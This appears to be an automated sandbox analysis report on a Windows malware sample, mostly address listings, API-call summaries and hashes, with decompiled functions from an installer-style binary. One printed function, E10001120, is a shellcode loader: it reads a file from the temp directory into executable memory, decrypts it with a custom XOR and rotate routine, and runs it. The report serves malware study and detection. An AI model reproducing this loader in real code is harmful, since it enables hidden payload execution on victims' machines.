                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b3b
                                                              0x00406b3b
                                                              0x00406b3f
                                                              0x00407147
                                                              0x00000000
                                                              0x00407147
                                                              0x00406b45
                                                              0x00406b48
                                                              0x00406b4b
                                                              0x00406b4f
                                                              0x00406b52
                                                              0x00406b58
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5d
                                                              0x00406b60
                                                              0x00406b60
                                                              0x00406b66
                                                              0x00406b04
                                                              0x00406b04
                                                              0x00406b07
                                                              0x00000000
                                                              0x00406b07
                                                              0x00406b68
                                                              0x00406b68
                                                              0x00406b6b
                                                              0x00406b6e
                                                              0x00406b71
                                                              0x00406b74
                                                              0x00406b77
                                                              0x00406b7a
                                                              0x00406b7d
                                                              0x00406b80
                                                              0x00406b83
                                                              0x00406b86
                                                              0x00406b9e
                                                              0x00406ba1
                                                              0x00406ba4
                                                              0x00406ba7
                                                              0x00406ba7
                                                              0x00406baa
                                                              0x00406bae
                                                              0x00406bb0
                                                              0x00406b88
                                                              0x00406b88
                                                              0x00406b90
                                                              0x00406b95
                                                              0x00406b97
                                                              0x00406b99
                                                              0x00406b99
                                                              0x00406bb3
                                                              0x00406bba
                                                              0x00406bbd
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406e4c
                                                              0x00406e4c
                                                              0x00406e50
                                                              0x00407177
                                                              0x00000000
                                                              0x00407177
                                                              0x00406e56
                                                              0x00406e59
                                                              0x00406e5c
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e69
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c1c
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f5b
                                                              0x00406f5f
                                                              0x00406f81
                                                              0x00406f84
                                                              0x00406f8e
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f61
                                                              0x00406f64
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6b
                                                              0x00406f6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00407018
                                                              0x0040701c
                                                              0x0040703a
                                                              0x0040703a
                                                              0x0040703a
                                                              0x00407041
                                                              0x00407048
                                                              0x0040704f
                                                              0x0040704f
                                                              0x00000000
                                                              0x0040704f
                                                              0x0040701e
                                                              0x00407021
                                                              0x00407024
                                                              0x00407027
                                                              0x0040702e
                                                              0x00406f72
                                                              0x00406f72
                                                              0x00406f75
                                                              0x00000000
                                                              0x00000000
                                                              0x00407109
                                                              0x0040710c
                                                              0x0040700d
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d43
                                                              0x00406d45
                                                              0x00406d4c
                                                              0x00406d4d
                                                              0x00406d4f
                                                              0x00406d52
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5a
                                                              0x00406d5d
                                                              0x00406d60
                                                              0x00406d62
                                                              0x00406d64
                                                              0x00406d64
                                                              0x00406d65
                                                              0x00406d68
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d80
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x00000000
                                                              0x00000000
                                                              0x00407065
                                                              0x00407065
                                                              0x00407069
                                                              0x004071a1
                                                              0x00000000
                                                              0x004071a1
                                                              0x0040706f
                                                              0x00407072
                                                              0x00407075
                                                              0x00407079
                                                              0x0040707c
                                                              0x00407082
                                                              0x00407084
                                                              0x00407084
                                                              0x00407084
                                                              0x00407087
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708d
                                                              0x0040708d
                                                              0x00407091
                                                              0x004070f1
                                                              0x004070f4
                                                              0x004070f9
                                                              0x004070fa
                                                              0x004070fc
                                                              0x004070fe
                                                              0x00407101
                                                              0x0040700d
                                                              0x0040700d
                                                              0x00000000
                                                              0x00407013
                                                              0x0040700d
                                                              0x00407093
                                                              0x00407099
                                                              0x0040709c
                                                              0x0040709f
                                                              0x004070a2
                                                              0x004070a5
                                                              0x004070a8
                                                              0x004070ab
                                                              0x004070ae
                                                              0x004070b1
                                                              0x004070b4
                                                              0x004070cd
                                                              0x004070d0
                                                              0x004070d3
                                                              0x004070d6
                                                              0x004070da
                                                              0x004070dc
                                                              0x004070dc
                                                              0x004070dd
                                                              0x004070e0
                                                              0x004070b6
                                                              0x004070b6
                                                              0x004070be
                                                              0x004070c3
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070c8
                                                              0x004070e3
                                                              0x004070ea
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x00406d88
                                                              0x00406d8b
                                                              0x00406dc1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef4
                                                              0x00406ef4
                                                              0x00406ef7
                                                              0x00406ef9
                                                              0x00407183
                                                              0x00000000
                                                              0x00407183
                                                              0x00406eff
                                                              0x00406f02
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f08
                                                              0x00406f0c
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00000000
                                                              0x00406f0f
                                                              0x00406d8d
                                                              0x00406d8f
                                                              0x00406d91
                                                              0x00406d93
                                                              0x00406d96
                                                              0x00406d97
                                                              0x00406d99
                                                              0x00406d9b
                                                              0x00406d9e
                                                              0x00406da1
                                                              0x00406db7
                                                              0x00406dbc
                                                              0x00406df4
                                                              0x00406df4
                                                              0x00406df8
                                                              0x00406e24
                                                              0x00406e26
                                                              0x00406e2d
                                                              0x00406e30
                                                              0x00406e33
                                                              0x00406e33
                                                              0x00406e38
                                                              0x00406e38
                                                              0x00406e3a
                                                              0x00406e3d
                                                              0x00406e44
                                                              0x00406e47
                                                              0x00406e74
                                                              0x00406e74
                                                              0x00406e77
                                                              0x00406e7a
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00000000
                                                              0x00406eee
                                                              0x00406e7c
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8b
                                                              0x00406e8e
                                                              0x00406e91
                                                              0x00406e94
                                                              0x00406e97
                                                              0x00406e9a
                                                              0x00406e9d
                                                              0x00406eb6
                                                              0x00406eb8
                                                              0x00406ebb
                                                              0x00406ebc
                                                              0x00406ebf
                                                              0x00406ec1
                                                              0x00406ec4
                                                              0x00406ec6
                                                              0x00406ec8
                                                              0x00406ecb
                                                              0x00406ecd
                                                              0x00406ed0
                                                              0x00406ed4
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed7
                                                              0x00406eda
                                                              0x00406edd
                                                              0x00406e9f
                                                              0x00406e9f
                                                              0x00406ea7
                                                              0x00406eac
                                                              0x00406eae
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406ee0
                                                              0x00406ee7
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00406ee7
                                                              0x00406dfa
                                                              0x00406dfd
                                                              0x00406dff
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0a
                                                              0x00406e0d
                                                              0x00406e10
                                                              0x00406e10
                                                              0x00406e13
                                                              0x00406e13
                                                              0x00406e16
                                                              0x00406e1d
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00406e1d
                                                              0x00406da3
                                                              0x00406da6
                                                              0x00406da8
                                                              0x00406dab
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b0a
                                                              0x00406b0a
                                                              0x00406b0e
                                                              0x00407153
                                                              0x00000000
                                                              0x00407153
                                                              0x00406b14
                                                              0x00406b17
                                                              0x00406b1a
                                                              0x00406b1d
                                                              0x00406b20
                                                              0x00406b23
                                                              0x00406b26
                                                              0x00406b28
                                                              0x00406b2b
                                                              0x00406b2e
                                                              0x00406b31
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c95
                                                              0x00406c95
                                                              0x00406c99
                                                              0x0040715f
                                                              0x00000000
                                                              0x0040715f
                                                              0x00406c9f
                                                              0x00406ca2
                                                              0x00406ca5
                                                              0x00406ca8
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406cad
                                                              0x00406cb0
                                                              0x00406cb3
                                                              0x00406cb6
                                                              0x00406cb9
                                                              0x00406cbc
                                                              0x00406cbd
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cc2
                                                              0x00406cc5
                                                              0x00406cc8
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406cce
                                                              0x00406cd0
                                                              0x00406cd0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f16
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f1c
                                                              0x00406f1f
                                                              0x00406f22
                                                              0x00406f25
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f2a
                                                              0x00406f2d
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00406f36
                                                              0x00406f39
                                                              0x00406f3a
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3f
                                                              0x00406f42
                                                              0x00406f45
                                                              0x00406f48
                                                              0x00406f4b
                                                              0x00406f4f
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00000000
                                                              0x00406f56
                                                              0x00406cd3
                                                              0x00406cd3
                                                              0x00000000
                                                              0x00406cd3
                                                              0x00406f54
                                                              0x00407189
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x004071c0
                                                              0x004071c0
                                                              0x00000000
                                                              0x004071c0
                                                              0x0040700d
                                                              0x00406f94
                                                              0x00406f91

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                                              • Instruction ID: 903876060ddd0b56a19be001448e640a61514b7b9d13fdc5f9f4a1faaeb2382a
                                                              • Opcode Fuzzy Hash: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                                              • Instruction Fuzzy Hash: AA714431D04229CBDF28CF98C844BADBBB1FF44305F15806AD856BB281C778AA96DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00440034, Relevance: 5.0, APIs: 3, Instructions: 549processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00440369
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004403B0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090883971.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                              Similarity
                                                              • API ID: Process$CreateMemoryRead
                                                              • String ID:
                                                              • API String ID: 2726527582-0
                                                              • Opcode ID: bba1a65e6104c149920c03ffdcefd9e0bda27a90779fee04d9ba1b411d0f078a
                                                              • Instruction ID: fded0a40f6a97637f889401eba155911deeb162dbf0f6301ac5f79a6d9c8967f
                                                              • Opcode Fuzzy Hash: bba1a65e6104c149920c03ffdcefd9e0bda27a90779fee04d9ba1b411d0f078a
                                                              • Instruction Fuzzy Hash: 2E322971D40218EEEB20CFA4DC45BADBBB5FF44705F20409AE609FA2A1D7745A90DF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 10001120, Relevance: 4.6, APIs: 3, Instructions: 140filememoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 62%
                                                              			E10001120(void* __eflags) {
				signed int _v8;
				short _v528;
				signed int _v529;
				signed int _v536;
				intOrPtr _v540;
				void* _v544;
				long _v548;
				void* _v552;
				long _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				signed int _t139;

				_v8 =  *0x10003028 ^ _t139;
				_v536 = 0;
				_v556 = 0;
				_v540 = E10001000();
				_v568 = E10001070(_v540, 0x8a111d91);
				_v560 = E10001070(_v540, 0xcbec1a0);
				_v564 = E10001070(_v540, 0xa4f84a9a);
				_v572 = E10001070(_v540, 0x170c1ca1);
				_v580 = E10001070(_v540, 0x433a3842);
				_v576 = E10001070(_v540, 0xa5f15738);
				_v560(0x103,  &_v528);
				_v564( &_v528, 0x10003000);
				_v552 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0);
				_v548 = _v572(_v552, 0);
				_v544 = VirtualAlloc(0, _v548, 0x3000, 0x40);
				ReadFile(_v552, _v544, _v548,  &_v556, 0);
				_v536 = 0;
				while(_v536 < _v556) {
					_v529 =  *((intOrPtr*)(_v544 + _v536));
					_v529 = _v529 & 0x000000ff ^ 0x000000f0;
					_v529 = (_v529 & 0x000000ff) - _v536;
					_v529 = _v529 & 0x000000ff ^ 0x00000071;
					_v529 = (_v529 & 0x000000ff) - _v536;
					_v529 = (_v529 & 0x000000ff) >> 0x00000001 | (_v529 & 0x000000ff) << 0x00000007;
					_v529 = (_v529 & 0x000000ff) - 0x43;
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 = (_v529 & 0x000000ff) - 0xb1;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - _v536;
					 *((char*)(_v544 + _v536)) = _v529;
					_v536 = _v536 + 1;
				}
				_v544();
				return E10001433(_v8 ^ _t139);
			}



















                                                              0x10001130
                                                              0x10001133
                                                              0x1000113d
                                                              0x1000114c
                                                              0x10001166
                                                              0x10001180
                                                              0x1000119a
                                                              0x100011b4
                                                              0x100011ce
                                                              0x100011e8
                                                              0x100011fa
                                                              0x1000120c
                                                              0x10001231
                                                              0x10001246
                                                              0x10001262
                                                              0x10001286
                                                              0x1000128c
                                                              0x100012a7
                                                              0x100012c7
                                                              0x100012da
                                                              0x100012ed
                                                              0x100012fd
                                                              0x10001310
                                                              0x1000132b
                                                              0x1000133b
                                                              0x1000134e
                                                              0x10001360
                                                              0x1000136f
                                                              0x10001382
                                                              0x1000139a
                                                              0x100012a1
                                                              0x100012a1
                                                              0x100013a1
                                                              0x100013b4

                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000122B
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 1000125C
                                                              • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 10001286
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2092165174.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000004.00000002.2092154979.0000000010000000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2092174189.0000000010002000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2092187739.0000000010004000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: File$AllocCreateReadVirtual
                                                              • String ID:
                                                              • API String ID: 3585551309-0
                                                              • Opcode ID: 24e74fd82567143b7d292cf12fbb544edcf8675b453f595437474f6461f7b99d
                                                              • Instruction ID: f4d82ce1cea42d54db54a80a354a6c046222731da62510561dac125a269ccc54
                                                              • Opcode Fuzzy Hash: 24e74fd82567143b7d292cf12fbb544edcf8675b453f595437474f6461f7b99d
                                                              • Instruction Fuzzy Hash: 9F614D74C462BC9ADB21DBA48C9CBEDBBB4AF59301F0481C8E55C66286C6345FC4CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040329A, Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E0040329A(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x41f8fc; // 0x3123a
				_t34 = _t32 -  *0x40b868 + _a4;
				 *0x424750 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E00403419( *0x41f90c);
				SetFilePointer( *0x40a01c,  *0x40b868, 0, 0); // executed
				 *0x41f908 = _t34;
				 *0x41f8f8 = 0;
				while(1) {
					_t10 =  *0x41f900; // 0x391a4
					_t31 = 0x4000;
					_t11 = _t10 -  *0x41f90c;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E00403403(0x4138f8, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x41f90c =  *0x41f90c + _t31;
					 *0x40b888 = 0x4138f8;
					 *0x40b88c = _t31;
					L6:
					L6:
					if( *0x424754 != 0 &&  *0x424800 == 0) {
						_t19 =  *0x41f908; // 0xb5b
						 *0x41f8f8 = _t19 -  *0x41f8fc - _a4 +  *0x40b868;
						E00402E52(0);
					}
					 *0x40b890 = 0x40b8f8;
					 *0x40b894 = 0x8000; // executed
					_t14 = E00406776(0x40b870); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40b890; // 0x40c453
					_t37 = _t36 - 0x40b8f8;
					if(_t37 == 0) {
						__eflags =  *0x40b88c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x41f8fc; // 0x3123a
						if(_t16 -  *0x40b868 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E00405E68( *0x40a01c, 0x40b8f8, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b868 =  *0x40b868 + _t37;
					_t49 =  *0x40b88c; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                              0x0040329d
                                                              0x004032aa
                                                              0x004032bd
                                                              0x004032c2
                                                              0x004033f2
                                                              0x004033f4
                                                              0x00000000
                                                              0x004033fa
                                                              0x004032ce
                                                              0x004032e1
                                                              0x004032e7
                                                              0x004032ed
                                                              0x004032f8
                                                              0x004032f8
                                                              0x004032fd
                                                              0x00403302
                                                              0x0040330a
                                                              0x0040330c
                                                              0x0040330c
                                                              0x00403315
                                                              0x0040331c
                                                              0x00000000
                                                              0x00000000
                                                              0x00403322
                                                              0x00403328
                                                              0x0040332e
                                                              0x00000000
                                                              0x00403334
                                                              0x0040333a
                                                              0x00403344
                                                              0x0040335a
                                                              0x0040335f
                                                              0x00403364
                                                              0x0040336a
                                                              0x00403370
                                                              0x0040337a
                                                              0x00403381
                                                              0x00000000
                                                              0x00000000
                                                              0x00403383
                                                              0x00403389
                                                              0x0040338b
                                                              0x004033ae
                                                              0x004033b4
                                                              0x00000000
                                                              0x00000000
                                                              0x004033b6
                                                              0x004033b8
                                                              0x00000000
                                                              0x00000000
                                                              0x004033ba
                                                              0x004033ba
                                                              0x004033cd
                                                              0x00000000
                                                              0x00000000
                                                              0x004033dc
                                                              0x00000000
                                                              0x004033dc
                                                              0x00403395
                                                              0x0040339c
                                                              0x004033e9
                                                              0x004033ef
                                                              0x004033ef
                                                              0x00000000
                                                              0x004033ef
                                                              0x0040339e
                                                              0x004033a4
                                                              0x004033aa
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004033ed
                                                              0x004033ed
                                                              0x00000000
                                                              0x004033ed
                                                              0x00000000

                                                              APIs
                                                              • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032AE
                                                                • Part of subcall function 00403419: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032E1
                                                              • SetFilePointer.KERNEL32(0003123A,00000000,00000000,004138F8,00004000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000), ref: 004033DC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: FilePointer$CountTick
                                                              • String ID:
                                                              • API String ID: 1092082344-0
                                                              • Opcode ID: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                                              • Instruction ID: 9f56c4e15643f9c800c1675ca7a95df02ba07fd451ae32c2dc2afdd0933238d4
                                                              • Opcode Fuzzy Hash: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                                              • Instruction Fuzzy Hash: E6317A72500216DFD710BF2AEE8496A3BACE740356324C13BE914B22F0CB3899469B9D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401B87, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 59%
                                                              			E00401B87(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40b860; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E004062BB(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x28)));
						_t11 =  *0x40b860; // 0x0
						 *_t34 = _t11;
						 *0x40b860 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E00406228(_t33, _t2);
							_push(_t30);
							 *0x40b860 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = "uvlcopdlxoed";
								E00406228(_t36, _t30 + 4);
								_t21 =  *0x40b860; // 0x0
								E00406228(_t32, _t21 + 4);
								_t24 =  *0x40b860; // 0x0
								_push(_t36);
								_push(_t24 + 4);
								E00406228();
								L15:
								 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004062BB(_t27, _t30, _t33, _t27, 0xffffffe8));
					E00405944();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}














                                                              0x00401b87
                                                              0x00401b87
                                                              0x00401b8a
                                                              0x00401b92
                                                              0x00401bda
                                                              0x00401c08
                                                              0x00401c11
                                                              0x00401c13
                                                              0x00401c17
                                                              0x00401c1c
                                                              0x00401c21
                                                              0x00401c23
                                                              0x00401bdc
                                                              0x00401bde
                                                              0x004027bf
                                                              0x00401be4
                                                              0x00401be4
                                                              0x00401be9
                                                              0x00401bf0
                                                              0x00401bf1
                                                              0x00401bf6
                                                              0x00401bf6
                                                              0x00401bde
                                                              0x00000000
                                                              0x00401b94
                                                              0x00401b94
                                                              0x00401b94
                                                              0x00401b97
                                                              0x00000000
                                                              0x00000000
                                                              0x00401b9d
                                                              0x00401ba1
                                                              0x00000000
                                                              0x00401ba3
                                                              0x00401ba5
                                                              0x00000000
                                                              0x00401bab
                                                              0x00401bab
                                                              0x00401bae
                                                              0x00401bb5
                                                              0x00401bba
                                                              0x00401bc4
                                                              0x00401bc9
                                                              0x00401bce
                                                              0x00401bd2
                                                              0x00402918
                                                              0x00402a5a
                                                              0x00402a5d
                                                              0x00402a63
                                                              0x00402a63
                                                              0x00401ba5
                                                              0x00000000
                                                              0x00401ba1
                                                              0x00402374
                                                              0x00402381
                                                              0x00402382
                                                              0x00402387
                                                              0x00402387
                                                              0x00402a65
                                                              0x00402a69

                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 00401BF6
                                                              • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C08
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Global$AllocFree
                                                              • String ID: uvlcopdlxoed
                                                              • API String ID: 3394109436-3939465813
                                                              • Opcode ID: 87d8389972323dd2f2e2010c7b91b881a8925242b088f8dabb0dcfd9ecaa9bed
                                                              • Instruction ID: 390df038645e4f22e1bedbd61b2e9eca8db7164d5315f5e1cad92dca3afb4e1e
                                                              • Opcode Fuzzy Hash: 87d8389972323dd2f2e2010c7b91b881a8925242b088f8dabb0dcfd9ecaa9bed
                                                              • Instruction Fuzzy Hash: 9F21C672700109ABCB10FBA5DE84A5E73E8EB453147114A3BF202B32E1DB7CD8128B5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00403192, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 92%
                                                              			E00403192(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4247b8;
					 *0x41f8fc = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040329A(4);
				if(_t22 >= 0) {
					_t24 = E00405E39( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x41f8fc =  *0x41f8fc + 4;
						_t36 = E0040329A(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x41f8fc =  *0x41f8fc + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E39( *0x40a01c, 0x4138f8, _t28) == 0) {
											goto L18;
										}
